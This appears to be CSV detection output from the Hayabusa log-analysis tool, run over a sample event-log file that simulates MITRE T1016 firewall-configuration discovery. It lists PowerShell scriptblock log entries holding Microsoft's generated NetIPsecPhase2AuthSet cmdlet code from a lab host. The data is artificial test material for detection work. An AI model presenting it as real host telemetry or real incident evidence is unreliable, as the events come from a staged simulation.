$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPs",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 
